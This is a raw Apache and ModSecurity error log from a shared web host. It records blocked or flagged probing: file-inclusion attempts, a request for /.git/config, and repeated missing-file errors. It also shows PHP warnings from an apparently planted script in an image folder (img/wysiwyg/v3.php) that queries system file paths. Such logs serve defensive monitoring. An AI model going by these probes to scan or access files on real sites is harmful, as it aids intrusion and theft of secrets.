[Mon May 11 15:23:54.397295 2026] [security2:error] [pid 1320674:tid 1320694] [client 195.178.110.133:63784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYWqO9RdIr1DwxYR2TYwAAAMQ"]
[Mon May 11 15:23:55.020813 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:63730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYV-SQ-m-m0ukSShuCiQAAAUI"]
[Mon May 11 15:23:55.654218 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.133:63708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYV-JEyNRN152ArOSNfwAAAEY"]
[Mon May 11 15:23:55.840739 2026] [security2:error] [pid 1319886:tid 1319926] [client 195.178.110.133:33586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYYay-5-wpj6Sx56aZcwAAABE"]
[Mon May 11 15:23:56.908679 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:33602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYYVchVQ3tCn0m9OpZxQAAAQk"]
[Mon May 11 15:23:57.481243 2026] [security2:error] [pid 1320674:tid 1320712] [client 195.178.110.133:34694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYZ6O9RdIr1DwxYR2TcAAAANc"]
[Mon May 11 15:23:57.529491 2026] [security2:error] [pid 1319885:tid 1319895] [client 195.178.110.133:33542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYXVchVQ3tCn0m9OpZwQAAAQY"]
[Mon May 11 15:23:58.120861 2026] [security2:error] [pid 1319998:tid 1320012] [client 195.178.110.133:33566] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYXat2WtvoFr7xvGzVfwAAAIw"]
[Mon May 11 15:23:58.745141 2026] [security2:error] [pid 1319886:tid 1319908] [client 195.178.110.133:63760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYWKy-5-wpj6Sx56aZbwAAAAY"]
[Mon May 11 15:23:58.866613 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.133:33626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYZKt2WtvoFr7xvGzVggAAAIM"]
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/5f/a00da94e7663f0066012bb0b9522f2ce363ed6 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/5f/a00da94e7663f0066012bb0b9522f2ce363ed6 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:24:13.155583 2026] [security2:error] [pid 1319998:tid 1320006] [client 43.166.136.202:33830] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agHYfat2WtvoFr7xvGzVlQAAAIY"]
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/f5/ecc139b0e7a90fd0767e050374240ef485b7dd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/f5/ecc139b0e7a90fd0767e050374240ef485b7dd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:25:15.494148 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.522704 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.547817 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.572923 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.598376 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.629036 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.654424 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.679682 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.704467 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.730647 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.755921 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.781334 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.806835 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.832279 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.858666 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.890005 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.915393 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.940754 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.965784 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:15.991388 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.017951 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.043016 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.069360 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.094275 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.119468 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.144381 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.169404 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.194189 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.219693 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.245841 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.270587 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.295598 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.320575 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.346063 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.371083 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.396429 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.421658 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.447388 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.478575 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.504023 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.529105 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.555450 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.580457 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.607033 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.632468 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.659112 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.684849 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.709681 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.735503 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.760147 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.785041 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.810536 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.836040 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.861552 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.886332 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.911077 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.935658 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.960093 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:16.987489 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.012504 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.036953 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.061448 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.086175 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.111035 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.136118 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.161180 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.186406 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.211690 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.237152 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.262114 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.287780 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.312366 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.337185 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.362178 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.387308 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.412899 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.437768 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.462567 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.495781 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.520957 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.546513 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.571578 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.597670 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.622601 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.647264 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.672394 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.696827 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.721478 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.748707 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.773433 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.797844 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.822092 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.846581 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.871509 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.895851 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.921374 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.945933 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.972940 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:17.998343 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.023234 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.048098 2026] [:error] [pid 1319886:tid 1319926] [client 52.169.148.186:10697] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.129130 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.165299 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.199748 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.234508 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.273690 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.309272 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.343800 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.382694 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.417455 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.452315 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.487012 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.521923 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.556385 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.591588 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.626895 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.661598 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.696271 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.730855 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.765832 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.800898 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:18.835696 2026] [:error] [pid 1319885:tid 1319907] [client 52.169.148.186:8518] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:25:32.254791 2026] [security2:error] [pid 1319885:tid 1319925] [client 35.189.90.11:47042] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHYzFchVQ3tCn0m9OpaJwAAARM"]
[Mon May 11 15:25:32.255421 2026] [security2:error] [pid 1319885:tid 1319925] [client 35.189.90.11:47042] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHYzFchVQ3tCn0m9OpaJwAAARM"]
[Mon May 11 15:25:32.256062 2026] [security2:error] [pid 1319885:tid 1319925] [client 35.189.90.11:47042] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHYzFchVQ3tCn0m9OpaJwAAARM"]
[Mon May 11 15:26:09.835320 2026] [security2:error] [pid 1320398:tid 1320406] [client 43.135.144.126:60840] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/"] [unique_id "agHY8eJEyNRN152ArOSORgAAAEY"]
